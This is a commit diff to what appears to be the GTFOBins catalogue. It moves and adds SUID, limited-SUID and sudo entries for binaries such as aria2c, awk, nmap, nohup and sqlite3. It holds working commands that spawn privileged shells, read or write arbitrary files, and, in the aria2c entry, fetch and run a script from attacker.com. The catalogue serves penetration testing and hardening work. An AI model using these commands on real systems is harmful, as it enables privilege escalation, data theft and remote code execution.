Minor fixes to SUID mainly

2024-10-22 16:48:09 +02:00 · 2021-01-18 09:23:50 +01:00 · 2021-01-18 09:23:50 +01:00 · eba354eda0
commit eba354eda0
parent 5c4ec744cb c85513d5a6
12 changed files with 47 additions and 16 deletions
--- a/_gtfobins/aria2c.md
+++ b/_gtfobins/aria2c.md
@ -10,13 +10,6 @@ functions:
        aria2c --on-download-error=$TF http://x
    - description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
      code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
-  suid:
-    - code: |
-        COMMAND='id'
-        TF=$(mktemp)
-        echo "$COMMAND" > $TF
-        chmod +x $TF
-        ./aria2c --on-download-error=$TF http://x
  sudo:
    - code: |
        COMMAND='id'
@ -24,4 +17,11 @@ functions:
        echo "$COMMAND" > $TF
        chmod +x $TF
        sudo aria2c --on-download-error=$TF http://x
+  limited-suid:
+    - code: |
+        COMMAND='id'
+        TF=$(mktemp)
+        echo "$COMMAND" > $TF
+        chmod +x $TF
+        ./aria2c --on-download-error=$TF http://x
 ---
--- a/_gtfobins/awk.md
+++ b/_gtfobins/awk.md
@ -27,6 +27,10 @@ functions:
    - code: |
        LFILE=file_to_read
        awk '//' "$LFILE"
+  suid:
+    - code: |
+        LFILE=file_to_read
+        ./awk '//' "$LFILE"
  sudo:
    - code: sudo awk 'BEGIN {system("/bin/sh")}'
  limited-suid:
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
@ -17,6 +17,11 @@ functions:
        ed file_to_read
        ,p
        q
+  suid:
+    - code: |
+        ./ed file_to_read
+        ,p
+        q
  sudo:
    - code: |
        sudo ed
--- a/_gtfobins/gawk.md
+++ b/_gtfobins/gawk.md
@ -27,6 +27,10 @@ functions:
    - code: |
        LFILE=file_to_read
        gawk '//' "$LFILE"
+  suid:
+    - code: |
+        LFILE=file_to_read
+        ./gawk '//' "$LFILE"
  sudo:
    - code: sudo gawk 'BEGIN {system("/bin/sh")}'
  limited-suid:
--- a/_gtfobins/hping3.md
+++ b/_gtfobins/hping3.md
@ -7,7 +7,7 @@ functions:
  suid:
    - code: |
        ./hping3
-        /bin/sh
+        /bin/sh -p
  sudo:
    - code: |
        sudo hping3
--- a/_gtfobins/lua.md
+++ b/_gtfobins/lua.md
@ -59,6 +59,8 @@ functions:
    - code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
  file-read:
    - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
+  suid:
+    - code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
  sudo:
    - code: sudo lua -e 'os.execute("/bin/sh")'
  limited-suid:
--- a/_gtfobins/lwp-request.md
+++ b/_gtfobins/lwp-request.md
@ -4,12 +4,12 @@ functions:
    - code: |
        LFILE=file_to_read
        lwp-request "file://$LFILE"
-  suid:
-    - code: |
-        LFILE=file_to_read
-        ./lwp-request "file://$LFILE"
  sudo:
    - code: |
        LFILE=file_to_read
        sudo lwp-request "file://$LFILE"
+  limited-suid:
+    - code: |
+        LFILE=file_to_read
+        ./lwp-request "file://$LFILE"
 ---
--- a/_gtfobins/mawk.md
+++ b/_gtfobins/mawk.md
@ -10,6 +10,10 @@ functions:
    - code: |
        LFILE=file_to_read
        mawk '//' "$LFILE"
+  suid:
+    - code: |
+        LFILE=file_to_read
+        ./mawk '//' "$LFILE"
  sudo:
    - code: sudo mawk 'BEGIN {system("/bin/sh")}'
  limited-suid:
--- a/_gtfobins/nawk.md
+++ b/_gtfobins/nawk.md
@ -27,6 +27,10 @@ functions:
    - code: |
        LFILE=file_to_read
        nawk '//' "$LFILE"
+  suid:
+    - code: |
+        LFILE=file_to_read
+        ./nawk '//' "$LFILE"
  sudo:
    - code: sudo nawk 'BEGIN {system("/bin/sh")}'
  limited-suid:
--- a/_gtfobins/nmap.md
+++ b/_gtfobins/nmap.md
@ -85,7 +85,7 @@ functions:
  file-write:
    - code: |
        TF=$(mktemp)
-        echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
+        echo 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
        nmap --script=$TF
    - description: The payload appears inside the regular nmap output.
      code: |
@ -94,7 +94,7 @@ functions:
  file-read:
    - code: |
        TF=$(mktemp)
-        echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
+        echo 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
        nmap --script=$TF
  sudo:
    - description: Input echo is disabled.
--- a/_gtfobins/nohup.md
+++ b/_gtfobins/nohup.md
@ -7,8 +7,8 @@ functions:
        COMMAND='/usr/bin/id'
        nohup "$COMMAND"
        cat nohup.out
+  suid:
+    - code: ./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
  sudo:
    - code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
-  suid:
-    - code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
 ---
--- a/_gtfobins/sqlite3.md
+++ b/_gtfobins/sqlite3.md
@ -14,6 +14,14 @@ functions:
        .import $LFILE t
        SELECT * FROM t;
        EOF
+  suid:
+    - code: |
+        LFILE=file_to_read
+        sqlite3 << EOF
+        CREATE TABLE t(line TEXT);
+        .import $LFILE t
+        SELECT * FROM t;
+        EOF
  sudo:
    - code: sudo sqlite3 /dev/null '.shell /bin/sh'
  limited-suid: